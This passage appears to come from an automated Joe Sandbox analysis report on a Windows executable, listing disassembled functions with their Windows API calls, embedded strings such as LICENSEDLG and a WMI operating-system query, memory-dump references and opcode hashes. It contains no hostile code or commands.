                                                                                                                        • GetWindowRect.USER32(?,?), ref: 00E9E4A2
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00E9E4DB
                                                                                                                        • GetSystemMetrics.USER32(00000008), ref: 00E9E4E3
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00E9E4EE
                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00E9E51B
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00E9E58D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                                                                        • String ID: $%s:$CAPTION$d$t
                                                                                                                        • API String ID: 2407758923-369353836
                                                                                                                        • Opcode ID: 6f71ab7d2c8119c6ce7e1c9a6f7c07caa8fad9244023148784ffb20cf1d0f872
                                                                                                                        • Instruction ID: 845a82636b245baeb14e8939dc04939e0fcb63b383bb6bc7a0b75f713a0e84c1
                                                                                                                        • Opcode Fuzzy Hash: 6f71ab7d2c8119c6ce7e1c9a6f7c07caa8fad9244023148784ffb20cf1d0f872
                                                                                                                        • Instruction Fuzzy Hash: E3819F72208301AFD710DFA9CD89E6BBBE9EBC9704F04591DFA84B7250D671E909CB52
                                                                                                                        Function 00EBCB22 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • ___free_lconv_mon.LIBCMT ref: 00EBCB66
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC71E
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC730
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC742
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC754
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC766
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC778
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC78A
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC79C
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7AE
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7C0
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7D2
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7E4
                                                                                                                          • Part of subcall function 00EBC701: _free.LIBCMT ref: 00EBC7F6
                                                                                                                        • _free.LIBCMT ref: 00EBCB5B
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EBCB7D
                                                                                                                        • _free.LIBCMT ref: 00EBCB92
                                                                                                                        • _free.LIBCMT ref: 00EBCB9D
                                                                                                                        • _free.LIBCMT ref: 00EBCBBF
                                                                                                                        • _free.LIBCMT ref: 00EBCBD2
                                                                                                                        • _free.LIBCMT ref: 00EBCBE0
                                                                                                                        • _free.LIBCMT ref: 00EBCBEB
                                                                                                                        • _free.LIBCMT ref: 00EBCC23
                                                                                                                        • _free.LIBCMT ref: 00EBCC2A
                                                                                                                        • _free.LIBCMT ref: 00EBCC47
                                                                                                                        • _free.LIBCMT ref: 00EBCC5F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                        • String ID: h
                                                                                                                        • API String ID: 161543041-3415971826
                                                                                                                        • Opcode ID: ae7339483e5d4ef60ead31a5839df4ff75e5943df7acdae0f1ed246a8be29343
                                                                                                                        • Instruction ID: 04f856743ceef7b3f43f892d2cdf0abf64a51b5b0d10cfc1192d4500e72df615
                                                                                                                        • Opcode Fuzzy Hash: ae7339483e5d4ef60ead31a5839df4ff75e5943df7acdae0f1ed246a8be29343
                                                                                                                        • Instruction Fuzzy Hash: 85314F315082059FEB21AA38D946BDBB7EDEF50314F60781AE148F6291DF31AC40CF10
                                                                                                                        Function 00EB96F1 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 54COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00EB9705
                                                                                                                          • Part of subcall function 00EB8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?), ref: 00EB8DE2
                                                                                                                          • Part of subcall function 00EB8DCC: GetLastError.KERNEL32(?,?,00EBC896,?,00000000,?,00000000,?,00EBC8BD,?,00000007,?,?,00EBCCBA,?,?), ref: 00EB8DF4
                                                                                                                        • _free.LIBCMT ref: 00EB9711
                                                                                                                        • _free.LIBCMT ref: 00EB971C
                                                                                                                        • _free.LIBCMT ref: 00EB9727
                                                                                                                        • _free.LIBCMT ref: 00EB9732
                                                                                                                        • _free.LIBCMT ref: 00EB973D
                                                                                                                        • _free.LIBCMT ref: 00EB9748
                                                                                                                        • _free.LIBCMT ref: 00EB9753
                                                                                                                        • _free.LIBCMT ref: 00EB975E
                                                                                                                        • _free.LIBCMT ref: 00EB976C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                        • String ID: 0d
                                                                                                                        • API String ID: 776569668-2809447700
                                                                                                                        • Opcode ID: 1c6810ee090d2eb8b81f53ca68c51e7dd50d696facc525ecad7cfe27ba0e41e5
                                                                                                                        • Instruction ID: 8fb843314f97c79526b47c27d5a9f8fc1aec9d9f69eaad49c8007af893010239
                                                                                                                        • Opcode Fuzzy Hash: 1c6810ee090d2eb8b81f53ca68c51e7dd50d696facc525ecad7cfe27ba0e41e5
                                                                                                                        • Instruction Fuzzy Hash: 9611A476110109AFCB01EF54CA42DDA3BBDEF14350B9164A6FA08AF262DE32DA50DF84
                                                                                                                        Function 00EA9711 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 126memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • _wcslen.LIBCMT ref: 00EA9736
                                                                                                                        • _wcslen.LIBCMT ref: 00EA97D6
                                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00EA97E5
                                                                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00EA9806
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00EA982D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                                                                                        • String ID: Fjun$</html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                                                                                        • API String ID: 1777411235-1684715023
                                                                                                                        • Opcode ID: 6b3a77ceb3cb7ce07c5a217b57128dfb0d2e9d473a1d74d3a65303bc6c00ebfa
                                                                                                                        • Instruction ID: b3141baa1c7c70cddd233820d7e071e1368b12277d56c836118f3a6c443b9468
                                                                                                                        • Opcode Fuzzy Hash: 6b3a77ceb3cb7ce07c5a217b57128dfb0d2e9d473a1d74d3a65303bc6c00ebfa
                                                                                                                        • Instruction Fuzzy Hash: C73139321083017ED725AB349C06FAB77D89F97310F14111EF402BA1D3EB75EA0982A6
                                                                                                                        Function 00EAD69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetWindow.USER32(?,00000005), ref: 00EAD6C1
                                                                                                                        • GetClassNameW.USER32(00000000,?,00000800), ref: 00EAD6ED
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 00EAD709
                                                                                                                        • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00EAD720
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00EAD734
                                                                                                                        • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00EAD75D
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00EAD764
                                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 00EAD76D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                                                                                                        • String ID: STATIC
                                                                                                                        • API String ID: 3820355801-1882779555
                                                                                                                        • Opcode ID: 9912654b72ca4030b00576cbcdcc435edf545c0bdd28b5308cd9d5503822e652
                                                                                                                        • Instruction ID: 5850fff32933e8eb8a655e4105fdd65e21e3f29b3ce46f59f45ae491aabc490b
                                                                                                                        • Opcode Fuzzy Hash: 9912654b72ca4030b00576cbcdcc435edf545c0bdd28b5308cd9d5503822e652
                                                                                                                        • Instruction Fuzzy Hash: 9D1136726043107FE2216B709C4AFBF769CAF8A711F005122FA52FA0D1DB64AF49C6B5
                                                                                                                        Function 00EB2E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                                                                                                        • String ID: csm$csm$csm
                                                                                                                        • API String ID: 322700389-393685449
                                                                                                                        • Opcode ID: 4fe9fc0e295ba04303ebdcfbb9200305ff81a97b1e557b9f4def400859b8939e
                                                                                                                        • Instruction ID: 99f06d63fade869bfcbdbc1b0d7f71cf201154527a972d36fd64f56d85218de4
                                                                                                                        • Opcode Fuzzy Hash: 4fe9fc0e295ba04303ebdcfbb9200305ff81a97b1e557b9f4def400859b8939e
                                                                                                                        • Instruction Fuzzy Hash: 39B15771900209EFCF29EFA8C8829EFBBB9EF04314F14615AE9157B212D731DA51CB91
                                                                                                                        Function 00E9AF24 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 210COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog
                                                                                                                        • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10$n
                                                                                                                        • API String ID: 3519838083-140586453
                                                                                                                        • Opcode ID: 69db50b85ffc7b884fbd385267a5899890186c8fc00a16e0b59ce0f9623aab2c
                                                                                                                        • Instruction ID: 02982b42537fa8cd5d0ddc5c4739ad748915ef34b46a5dfcfe1fa834275343a7
                                                                                                                        • Opcode Fuzzy Hash: 69db50b85ffc7b884fbd385267a5899890186c8fc00a16e0b59ce0f9623aab2c
                                                                                                                        • Instruction Fuzzy Hash: 68717B71A00219EFDF18DFA5D895DAEB7B9FF49314B04516DE412B72A0CB31AE42CB60
                                                                                                                        Function 00E96FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E96FAA
                                                                                                                        • _wcslen.LIBCMT ref: 00E97013
                                                                                                                        • _wcslen.LIBCMT ref: 00E97084
                                                                                                                          • Part of subcall function 00E97A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00E97AAB
                                                                                                                          • Part of subcall function 00E97A9C: GetLastError.KERNEL32 ref: 00E97AF1
                                                                                                                          • Part of subcall function 00E97A9C: CloseHandle.KERNEL32(?), ref: 00E97B00
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
                                                                                                                        • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                        • API String ID: 3122303884-3508440684
                                                                                                                        • Opcode ID: f9e83c8ba406a7f70041f8611880e330af1ddfc0f5fd7ed42db1b75786a4c94a
                                                                                                                        • Instruction ID: 8a12788c3249516efc08d5953cb86136acfd35795b995b7f7eb54d5bcf6a76b1
                                                                                                                        • Opcode Fuzzy Hash: f9e83c8ba406a7f70041f8611880e330af1ddfc0f5fd7ed42db1b75786a4c94a
                                                                                                                        • Instruction Fuzzy Hash: FF4118B1D18344BAEF30E7709D82FEFB7AC9F05304F046456FA85B6182D675AA8C8761
                                                                                                                        Function 00EAB5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00E91316: GetDlgItem.USER32(00000000,00003021), ref: 00E9135A
                                                                                                                          • Part of subcall function 00E91316: SetWindowTextW.USER32(00000000,00EC35F4), ref: 00E91370
                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00EAB610
                                                                                                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 00EAB637
                                                                                                                        • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00EAB650
                                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00EAB661
                                                                                                                        • GetDlgItem.USER32(?,00000065), ref: 00EAB66A
                                                                                                                        • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00EAB67E
                                                                                                                        • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00EAB694
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Item$TextWindow$Dialog
                                                                                                                        • String ID: LICENSEDLG
                                                                                                                        • API String ID: 3214253823-2177901306
                                                                                                                        • Opcode ID: 5a5874113f7bc7857aeb1c4320a5a7545c559a08ff582988fba1dfd7ddd19791
                                                                                                                        • Instruction ID: 714031f115dce63c71b721e8911ada91c20b4acf889012415712d4e0aa953b3d
                                                                                                                        • Opcode Fuzzy Hash: 5a5874113f7bc7857aeb1c4320a5a7545c559a08ff582988fba1dfd7ddd19791
                                                                                                                        • Instruction Fuzzy Hash: F421D332604209BFD2119B77ED4AF7B3B6DEBCFB45F115015F600BA0A2CB52A905D635
                                                                                                                        Function 00EAFD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,193C2A8D,00000001,00000000,00000000,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFD99
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFE14
                                                                                                                        • SysAllocString.OLEAUT32(00000000), ref: 00EAFE1F
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE48
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE52
                                                                                                                        • GetLastError.KERNEL32(80070057,193C2A8D,00000001,00000000,00000000,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFE57
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE6A
                                                                                                                        • GetLastError.KERNEL32(00000000,?,?,00E9AF6C,ROOT\CIMV2), ref: 00EAFE80
                                                                                                                        • _com_issue_error.COMSUPP ref: 00EAFE93
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1353541977-0
                                                                                                                        • Opcode ID: e42ddf4bd9559884f670a2bf0b130f65da04353736b6bf5f520a1f8a283b8f78
                                                                                                                        • Instruction ID: 80cf6d8ec8029289791df035d0ade95a2bacb2459b162a83a2ced57bccc4a779
                                                                                                                        • Opcode Fuzzy Hash: e42ddf4bd9559884f670a2bf0b130f65da04353736b6bf5f520a1f8a283b8f78
                                                                                                                        • Instruction Fuzzy Hash: 7041E771A00305AFCB109FA9CC45FAFBBE8EB49724F14923AF905FB251D735A90187A4
                                                                                                                        Function 00E99382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog.LIBCMT ref: 00E99387
                                                                                                                        • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00E993AA
                                                                                                                        • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00E993C9
                                                                                                                          • Part of subcall function 00E9C29A: _wcslen.LIBCMT ref: 00E9C2A2
                                                                                                                          • Part of subcall function 00EA1FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,00E9C116,00000000,.exe,?,?,00000800,?,?,?,00EA8E3C), ref: 00EA1FD1
                                                                                                                        • _swprintf.LIBCMT ref: 00E99465
                                                                                                                          • Part of subcall function 00E94092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E940A5
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E994D4
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00E99514
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1701868563.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1701851032.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701901210.0000000000EC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000ED5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701919059.0000000000EF2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1701973570.0000000000EF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_e90000_8k1e14tjcx.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
                                                                                                                        • String ID: rtmp%d
                                                                                                                        • API String ID: 3726343395-3303766350
                                                                                                                        • Opcode ID: a8b5b888d621a25167140da51ac845f55747cee5e2cfec90d854cb14c6293794
                                                                                                                        • Instruction ID: be3a729fe2d1ab927e8a6615a6e53af4a98d29b10fbeb6b68d95fa71756c8947
                                                                                                                        • Opcode Fuzzy Hash: a8b5b888d621a25167140da51ac845f55747cee5e2cfec90d854cb14c6293794
                                                                                                                        • Instruction Fuzzy Hash: 404166B1900254AADF21FBA4CD45EDF73BCAF45344F0058A9B649F7152DB389B898B70
                                                                                                                        Function 00E91100 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 119COMMON
